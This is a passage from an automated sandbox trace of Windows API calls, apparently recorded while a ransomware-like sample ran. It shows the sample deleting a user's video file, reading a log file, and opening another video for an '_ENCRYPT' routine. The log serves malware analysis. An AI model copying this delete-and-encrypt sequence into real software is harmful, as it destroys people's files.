(HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0041.914] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0041.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0041.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0041.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0041.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0041.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0041.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0041.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0041.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0041.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0041.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0041.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0041.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0041.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0041.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0041.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0041.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0041.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0041.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0041.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1788 | out: hHeap=0x770000) returned 1 [0041.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0041.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0041.915] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.915] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0041.915] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0041.915] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0041.915] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0041.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0041.915] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0041.915] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0041.915] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0041.915] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0041.915] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0041.915] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0041.915] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\lIYPp18.mp4", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\lIYPp18.mp4", lpFilePart=0x0) returned 0x30 [0041.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0041.916] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db378 [0041.916] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\lIYPp18.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\liypp18.mp4")) returned 0x20 [0041.916] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0041.916] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af538 [0041.916] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0041.916] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0041.916] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0041.916] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0041.916] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0041.916] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0041.916] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0041.916] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0041.916] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0041.916] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db3f0 [0041.916] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0041.916] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f36e0 [0041.916] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0041.916] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3688 [0041.916] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db3f0 | out: hHeap=0x770000) returned 1 [0041.916] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0041.916] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0041.916] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0041.916] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1788 | out: hHeap=0x770000) returned 1 [0041.916] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0041.916] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f36e0 | out: hHeap=0x770000) returned 1 [0041.916] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0041.916] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0041.916] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0041.916] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\lIYPp18.mp4", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4aff59b0, ftCreationTime.dwHighDateTime=0x1d5bb64, ftLastAccessTime.dwLowDateTime=0xc55df7e0, ftLastAccessTime.dwHighDateTime=0x1d5c4cc, ftLastWriteTime.dwLowDateTime=0x18b11320, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x13c5f, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="lIYPp18.mp4", cAlternateFileName="")) returned 0x7c2100 [0041.917] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\lIYPp18.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\liypp18.mp4")) returned 1 [0041.918] FindNextFileW (in: hFindFile=0x7c2100, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4aff59b0, ftCreationTime.dwHighDateTime=0x1d5bb64, ftLastAccessTime.dwLowDateTime=0xc55df7e0, ftLastAccessTime.dwHighDateTime=0x1d5c4cc, ftLastWriteTime.dwLowDateTime=0x18b11320, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x13c5f, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="lIYPp18.mp4", cAlternateFileName="")) returned 0 [0041.918] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0041.918] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3688 | out: hHeap=0x770000) returned 1 [0041.918] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0041.918] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0041.918] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0041.918] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0041.918] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.918] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.918] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0041.918] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0041.918] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0041.918] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0041.918] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0041.918] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0041.918] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0041.918] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0041.918] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0041.919] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0041.919] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0041.919] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0041.919] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0041.919] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0041.919] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.919] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.919] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.919] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0041.919] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0041.919] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0041.919] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0041.919] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0041.919] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0041.919] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0041.919] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0041.919] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0041.919] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0041.919] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0041.919] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0041.919] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0041.919] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0041.919] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0041.919] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0041.919] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0041.920] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0041.920] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0041.920] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0041.920] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0041.920] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0041.920] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0041.920] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab2010 [0041.920] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0041.920] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0041.920] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x32ad, lpOverlapped=0x0) returned 1 [0041.921] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0041.921] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x32ad, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0041.921] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0041.923] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.923] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.923] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0041.923] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0041.923] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0041.923] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0041.923] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0041.923] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0041.923] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0041.923] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0041.923] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0041.923] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0041.923] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0041.923] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0041.923] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0041.923] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0041.923] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0041.923] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0041.923] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0041.923] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0041.924] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0041.924] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0041.924] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0041.924] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0041.924] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x8897d8 [0041.924] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x8897d8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0041.924] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\S24Ya.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\s24ya.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0041.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0041.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0041.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0041.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0041.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0041.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0041.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0041.925] FreeLibrary (hLibModule=0x76e10000) returned 1 [0041.925] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0041.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0041.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0041.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0041.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0041.925] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0041.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0041.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0041.925] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0041.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cc40 [0041.925] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88cc40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0041.925] FreeLibrary (hLibModule=0x76e10000) returned 1 [0041.925] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0041.925] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0041.926] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0041.926] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.926] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.926] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="flv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.926] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".flv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0041.926] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\S24Ya.flv", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x726f64d0, ftCreationTime.dwHighDateTime=0x1d5c1d7, ftLastAccessTime.dwLowDateTime=0xc0080c50, ftLastAccessTime.dwHighDateTime=0x1d5bb48, ftLastWriteTime.dwLowDateTime=0xc0080c50, ftLastWriteTime.dwHighDateTime=0x1d5bb48, nFileSizeHigh=0x0, nFileSizeLow=0x109f6, dwReserved0=0x0, dwReserved1=0x777648, cFileName="S24Ya.flv", cAlternateFileName="")) returned 0x7c20c0 [0041.926] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0041.926] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0041.926] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0041.926] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0041.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0041.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0041.926] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0041.926] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0041.926] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0041.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0041.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0041.926] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0041.926] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0041.926] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0041.926] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0041.926] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0041.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0041.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0041.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0041.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0041.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0041.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0041.927] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\S24Ya.flv", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x726f64d0, ftCreationTime.dwHighDateTime=0x1d5c1d7, ftLastAccessTime.dwLowDateTime=0xc0080c50, ftLastAccessTime.dwHighDateTime=0x1d5bb48, ftLastWriteTime.dwLowDateTime=0xc0080c50, ftLastWriteTime.dwHighDateTime=0x1d5bb48, nFileSizeHigh=0x0, nFileSizeLow=0x109f6, dwReserved0=0x0, dwReserved1=0x777648, cFileName="S24Ya.flv", cAlternateFileName="")) returned 0x7c20c0 [0041.927] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0041.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0041.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0041.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0041.927] RtlAllocateHeap (HeapHandle=0x770000, 